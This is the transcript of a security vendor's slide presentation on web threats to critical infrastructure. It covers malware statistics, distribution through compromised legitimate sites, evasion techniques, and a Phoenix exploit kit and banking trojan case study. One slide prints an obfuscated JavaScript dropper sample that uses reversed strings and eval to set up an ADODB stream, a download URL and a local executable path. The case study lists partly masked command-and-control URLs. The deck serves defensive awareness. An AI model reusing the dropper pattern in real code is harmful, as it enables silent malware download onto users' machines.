Protect critical infrastructure by Patrick de Jong

Protecting your critical infrastructure

against web threats

Agenda:

• Critical infrastructure / web threats relation

• What are we facing (some statistics) and why

• Spreading the malware

• How do ‘they’ stay undetected?

• What harm can ‘they’ do?

• An example (Phoenix + Banker trojan)

• The message of the photo (opening slide)

Crititcal infrastructure Web threats?

Digitized control (remote) based on

standard OS like Windows or Linux and

using standard Ethernet , TCP/IP

‘Everything’ got connected.

Proprietary boxes with push

buttons and switches. without

any networking/connectivity

(later with proprietary OS and

networks).

Crititcal infrastructure – Web threats

Web-based Threats

92%Of new threats come

from the Web

Some statistics(what are we facing)

671%Increase in Web

Malware* over 2008

79,9%Web malware from legitimate

sites**

* AV-test currently (01-2011) counted 50 million samples

** Source: Websense

Some statistics(what are we facing)

Social

Networking

Social

Networking

Enterprise

SaaS

Enterprise

SaaS

Collaboration

Tools

Collaboration

Tools

Under 40%Current AV catch

rates*

Malware dead within

Web 2.0 Landscape

Client

Applications

Client

Applications

Social

Media

Social

Media

Media

Sharing

Media

Sharing

Interactive

Sharing

Interactive

Sharing

Mass

Comms

Mass

Comms

WEB 2.0 52%Malware dead within

24 hours**

10 billionWorld-wide blended

threat emails per day

* Source: M86 SecurityLabs

**Source: Panda Labs

Why? Driven by money.Just as Professional as Commercial Software

7

Why? Driven by money. Joint venture toolkits

Why? Driven by money. Data selling

Why? Mostly driven by money. Buying & Selling ‘victims’

Spreading the malwareemail spam and malicous websites

Spreading the malwaremalware distribution via legitimate websites (stolen ftp or hack)

Spreading the malwaremalware distribution via legitimate websites (stolen ftp or hack)

• Attacker benefits from someone else’s traffic and reputation

• Designed to defeat URL filtering & reputation software

• Most malware is now spread via compromised legitimate sites

How ‘they’ stay undetected

How they stay undetectedEvasive techniques

How they stay undetected Evasive techniques behind the scenes

How they stay undetected Code obfuscation

var fname = "C:\\mssync20.exe";

var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth");

RE("");

var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod");

RE(";)'r_','di'(etubirttAtes.r_");

RE(";)'63E92CF40C00-A389-0D11-3A56-655C69DB:dislc','dissalc'(etubirttAtes.r_");

var is_ok= 0;

try

{

var _s = RE(";)'','maerts.bdoda'(tcejbOetaerC.r_");

is_ok= 1;

}

catch(e){}catch(e){}

if (is_ok!= 1)

{

try

{

var _s = RE(";)'maerts.bdoda'(tcejbOXevitcA wen");

is_ok= 1;

}

catch(e){}

}

function RE(s) { return eval(RV(s)); }

function RV(s)

{

var rev = "";

for (i = 0; i < s.length; i++)

{

rev = s.charAt(i) + rev;

}

return rev;

}

Reverse malicious code – undetected !! ‘Actual’ Malicious code – detected (7 out of 31)

How they stay undetected Code obfuscation

How they stay undetected Dynamic code obfuscation

How they stay undetected Private exploit encryption

NeoSploit

Infection process

… <malicious IFRAME>…

Generating obfuscated JS

Generating key and

sending it to the server

Using the key to generate

an encrypted script that is

sent back to the client

The browser opens the

encrypted script with key

and executes the JS code

Toolkits/Trojans/C&CWhat can they do with it

Example: banking trojanMoney mules

Example: banking trojan

Using stolen FTP accounts, the cyber gang managed to inject an Iframe

that leads to the Phoenix Exploit Kit on thousands of legitimate

websites

The user accesses to a compromised websiteThe website content contains

redirection to the Phoenix Exploit Kit


The user accesses to a compromised websiteredirection to the Phoenix Exploit Kit

The user’s PC exploited, the payload was downloaded successfully

The user is redirected to the Phoenix Exploit Kit 2.3

http://fan******.net/.ph/5

This specific configuration file contains injection orders

that will be used when the user accesses to the bank


The malware downloads a configuration file from:

hxxp://uste*****.com.tr/Scripts/rd.bin

The gang doesn’t want to uncover the

main C&C to the world and uses the

Exploit Kit server as a proxy to the main

C&C server

After successful connection test, the bot reports

the C&C server about new installation to:

hxxp://195.***.**.147:3128/data/set.php


Before the Trojan accesses to the Command & Control server

it verifies the user’s PC is connected to the internet.

http://google.com/webhp

hxxp://195.***.**.147:3128/data/set.php


Besides the Trojan banker, the

server sends the user another

malware – Fake AVThe gang operates in multiple vectors, using social

engineering it tries to convince the user to buy fake AV


The Trojan adds a script (on the client site) to every page in

the website. Of course the script is not located on the server,

and the user is redirected to the C&C to download it:

hxxp://cheap********card.info/brap/bscript.jsThe Trojan holds until the user accesses the bank

From that point the Trojan supervises all user activity

with the bank.


The moment at which the user tries to commit a

transaction, the bot communicates with the C&C and

receives full information about the new transaction

that the bot is intending to commit.

The bot replaces the details in the ‘transaction

submit form’ and sends it to the server


An example of a successful transaction generated by

the Trojan to the money mule account

Web-based vulnerability: The (mobile) user

33

Web-based vulnerability: The (mobile) user

• Roams Between various

ISPs:

– Wi-fi Airport and Hotel

– Home Office

– Other

• No Web Security Policy

Protection when Off the

Corporate Networks

• Readily Infected by

Compromised Legitimate

Sites

• Reconnects to Corporate

Networks after Trips

• Brings Potential Malware

back Into the Organisations’

Network

34

The photo

1. Evading dubious sites is key to keep malware out?

2. Websites with a good reputation won’t infect you?

3. As long as your AV is updated there is nothing to worry about?

4. Protecting the enduser workstation is very important when

protecting your critical security infrastructure?

Patrick de Jong

Sales Engineer Northern Europe

Phone: +31 33 454 3533

Mobile: +31 6 1373 2964

Email: [email protected]

Protect critical infrastructure by Patrick de Jong

Technology

Transcript of Protect critical infrastructure by Patrick de Jong